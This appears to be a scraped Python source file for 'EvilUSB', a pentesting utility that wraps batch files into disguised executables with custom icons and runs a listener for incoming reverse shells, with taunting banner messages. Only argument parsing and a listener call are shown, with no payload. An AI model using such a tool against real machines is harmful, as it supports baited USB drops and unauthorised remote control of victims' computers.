Ejemplo n.º 1
0
import os
import shutil
import random
import argparse
import subprocess
from utils.log import Log
import ReverseShellManager


Log.ascii('''
   _   ,--()
  ( )-'-.------|>
   "     `--[]

EvilUSB\t''')

start = ["Oops, I think I dropped something", "Arrg, this fricking USB never inserts at 1st try", "Sssh, do you hear that? We have baited them", "Wut u doing bru? Do ur red team stuff and stop reading this!", "While you read this you are being hacked. Haha!", "All shells belongs to me!"]

Log.phrases(random.choice(start))

parser = argparse.ArgumentParser(description="EvilUSB: Quick utility to craft executables for pentesting and managing reverse shells.")
parser.add_argument("-b", "--bat", help="Path to bat file")
parser.add_argument("-i", "--icon", help="Path to icon file (.ico)")
parser.add_argument("-o", "--output", help="Path to exe output")
parser.add_argument("-t", "--target", help="Set 32 or 64 for platform architecture", default=32)
parser.add_argument("-l", "--listen", help="Listen for incoming connections", action='store_true')
parser.add_argument("-p", "--port", help="Listening port", default=4444)
args = parser.parse_args()

if args.listen:
    ReverseShellManager.main("0.0.0.0", args.port)